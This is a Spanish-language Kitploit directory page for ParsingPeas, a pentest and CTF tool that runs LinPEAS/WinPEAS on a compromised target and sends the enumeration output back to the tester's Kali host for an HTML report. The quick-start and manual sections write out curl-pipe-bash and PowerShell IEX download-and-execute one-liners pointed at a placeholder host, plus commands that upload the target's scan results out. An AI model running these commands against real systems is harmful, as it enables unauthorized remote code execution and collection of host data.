Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ParsingPeas — Analizador HTML para la salida de PEAS con características adicionales | Kitploit
Herramientas/GitHubGitHub/yuvalmil/parsingpeas
Escalada de PrivilegiosScripting y AutomatizaciónRecopilación de InformaciónPost-ExplotaciónCTFPruebas de PenetraciónUtilidades y FrameworksAprendizaje y EducaciónLabs y Práctica
GitHubyuvalmil/parsingpeas

ParsingPeas

Analizador HTML para la salida de PEAS con características adicionales

15914hace 1 mesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

ParsingPeas 🥒

Recopilación automatizada de PEASS + un informe HTML limpio y portátil para trabajo de escalada de privilegios en CTF y laboratorios.

License: MIT Python 3.8+

Ejecuta un solo comando en el objetivo. ParsingPeas obtiene LinPEAS/WinPEAS desde tu host Kali, ejecuta el escaneo, envía la salida de vuelta y la convierte en un único informe HTML autocontenido que puedes leer, buscar, clasificar y conservar — sin transferencia manual de archivos, sin internet en el objetivo.


Capturas de pantalla

Resumen del informe — secciones agrupadas por las propias categorías de LinPEAS, con puntos de hallazgos y una barra de hallazgos:

Resumen del informe

Solo hallazgos — un clic filtra el informe y la barra lateral para mostrar solo las secciones con resultados críticos/altos:

Solo hallazgos

Salida completa del terminal — el escaneo completo, fielmente coloreado; se puede buscar con Ctrl-F:

Salida completa del terminal


Por qué

La salida bruta de PEASS es un muro de texto de terminal que desaparece en cuanto tu shell muere. ParsingPeas:

  • Automatiza el trabajo tedioso — sin scp, sin tener que alojar linpeas tú mismo, sin copiar y pegar la salida de vuelta a Kali.
  • Lo guarda — cada escaneo se convierte en un informe HTML con marca de tiempo en tu host.
  • Lo hace navegable — la salida se divide en las secciones reales de LinPEAS con una barra lateral categorizada, resaltado de hallazgos y búsqueda de texto completo.
  • Viaja bien — cada informe es un único archivo .html autocontenido que puedes copiar fuera de la máquina, archivar o abrir sin conexión haciendo doble clic.

Es presentación + logística, no un motor de explotación: conserva fielmente el coloreado y los hallazgos de PEASS en lugar de cuestionarlos.


Características

  • Flujo de trabajo de una línea — el objetivo descarga el envoltorio desde tu host, ejecuta PEASS y envía automáticamente el resultado mediante POST.
  • Funciona sin conexión en el objetivo — todo se sirve desde tu host Kali.
  • Análisis de secciones fiel — sigue la jerarquía real de encabezados de dos niveles de LinPEAS (secciones principales + subchequeos); los enlaces de hacktricks y las líneas de comprobación permanecen como contenido sin saturar el índice.
  • Informes autocontenidos — la salida del terminal se incrusta en línea; un solo archivo, sin archivos auxiliares, se abre mediante file://.
  • Vista de informe interactiva:
    • Índice en la barra lateral agrupado por las propias secciones de PEASS, con recuentos de críticos/altos.
    • Barra de hallazgos — chips N críticos / N altos que saltan entre secciones marcadas, más una leyenda de colores.
    • Filtro de solo hallazgos para clasificación rápida.
    • Alternar ajuste de línea (activado por defecto — sin más líneas truncadas).
    • Scrollspy — la sección actual se resalta en el índice mientras te desplazas.
    • Encabezados de sección fijos y puntos de "marcar como leído" que persisten (localStorage, por informe).
    • Insignias de encabezado para el usuario actual (rojo si es root) y SO.
  • Pestaña de salida completa del terminal — el escaneo completo y totalmente coloreado, renderizado de una sola vez para que la Ctrl-F del navegador busque en todo.
  • Tema oscuro y suave — agradable a la vista en sesiones largas.
  • Linux y Windows — LinPEAS (bash) y WinPEAS (PowerShell).

Inicio rápido

En tu host Kali

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # descarga LinPEAS + WinPEAS en scripts/
pip3 install -r requirements.txt
python3 receiver.py             # sirve en http://0.0.0.0:8005

Deja receiver.py en ejecución. Encuentra la IP a la que el objetivo te alcanzará:

  • HTB / VPN: tu dirección tun0 — ip -4 addr show tun0
  • LAN: la IP de tu interfaz normal

En el objetivo

Linux/Unix (usa curl, recurre a wget):

root@kitploit:~
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash

Windows (PowerShell / reverse shell):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"

Elige la línea que coincida con el SO del objetivo — Linux sirve LinPEAS, Windows sirve WinPEAS.

Ver el informe

Los informes se generan en tu host Kali en ./reports/. Puedes:

  • Navegar por el índice en http://TU_IP_KALI:8005 y hacer clic en un informe, o
  • Abrir el archivo generado directamente — es autocontenido:
    root@kitploit:~
    xdg-open ./reports/report_<host>_<timestamp>.html
    

Copia ese único .html donde quieras; funciona por sí solo.


Cómo funciona

root@kitploit:~
Objetivo → descarga envoltorio desde Kali → ejecuta PEASS → envía salida mediante POST → Kali analiza → informe HTML autocontenido

El objetivo nunca necesita internet — el envoltorio y los binarios de PEASS se sirven desde tu host.


Uso del informe

  • Pestaña Resumen del informe — secciones agrupadas por categoría de PEASS en la barra lateral. Los puntos rojos/amarillos marcan secciones con hallazgos críticos/altos. Usa los chips de Hallazgos para saltar directamente a ellos, o Solo hallazgos para ocultar todo lo demás.
  • Pestaña Salida completa del terminal — el escaneo completo coloreado. Simplemente presiona Ctrl-F para buscar; toda la salida está renderizada, por lo que la búsqueda nativa lo cubre todo.
  • Haz clic en un punto de hallazgo para marcar una sección como leída — permanecerá leída cuando vuelvas a abrir el informe.

Uso manual

Si la línea de un solo comando falla, hazlo manualmente.

Linux:

root@kitploit:~
# En el objetivo
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Enviar de vuelta
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://KALI_IP:8005/upload

Windows (PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

Analizar un volcado de PEASS que ya tengas:

root@kitploit:~
python3 parser.py /path/to/peas_output.txt   # escribe un informe HTML en ./reports/

Configuración

Edita la parte superior de receiver.py:


Solución de problemas

  • ¿No puedes descargar el script? Ejecuta curl http://KALI_IP:8005/health para comprobar la conectividad; abre el cortafuegos con sudo ufw allow 8005/tcp.
  • ¿404 en /get-linpeas? Ejecuta ./setup.sh para obtener los binarios de PEASS.
  • ¿Sin salida en vivo en una reverse shell de PowerShell? Es esperado — el escaneo aún se ejecuta; observa tu receptor para la confirmación de la subida.

Seguridad

⚠️ Solo para pruebas de penetración autorizadas, CTFs y uso en laboratorio.

  • Sin autenticación — ejecútalo solo en redes aisladas/CTF, detrás de un cortafuegos.
  • Los valores de los encabezados de subida se sanitizan y las subidas tienen un límite de tamaño, pero el servidor no está endurecido para exposición hostil en internet.

Créditos

Construido sobre PEASS-ng por @carlospolop. ParsingPeas solo recopila y presenta su salida.


Licencia MIT · Las contribuciones son bienvenidas

Descargar herramienta
ConfiguraciónValor por defectoNotas
Puerto8005cambia la línea app.run(... port=...)
OUTPUT_DIR./received_outputsescaneos subidos en bruto
REPORTS_DIR./reportsinformes HTML generados
SCRIPTS_DIR./scriptsbinarios de LinPEAS/WinPEAS
MAX_UPLOAD_SIZE10 MBaplicado — las subidas más grandes reciben HTTP 413